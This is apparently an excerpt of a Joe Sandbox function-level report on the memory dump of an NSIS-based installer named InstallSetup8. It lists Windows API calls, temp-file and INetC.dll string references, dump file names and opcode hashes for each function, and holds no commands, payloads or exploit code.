GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu43C0.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsu43C0.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu43C0.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsu43C0.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsu43C0.tmp
API String ID: 2655323295-1384321896
Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Uniqueness

Uniqueness Score: -1.00%

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E
C:\Users\user\AppData\Local\Temp\nsu43BF.tmp, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsu43BF.tmp
API String ID: 3248276644-3599075669
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\Users\user\AppData\Local\Temp\nsu43BF.tmp, xrefs: 00405ED2

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsu43BF.tmp
API String ID: 3213498283-4014855586
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsu43C0.tmp, xrefs: 00402688
C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsu43C0.tmp$C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll
API String ID: 1659193697-1583219077
Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Uniqueness

Uniqueness Score: -1.00%

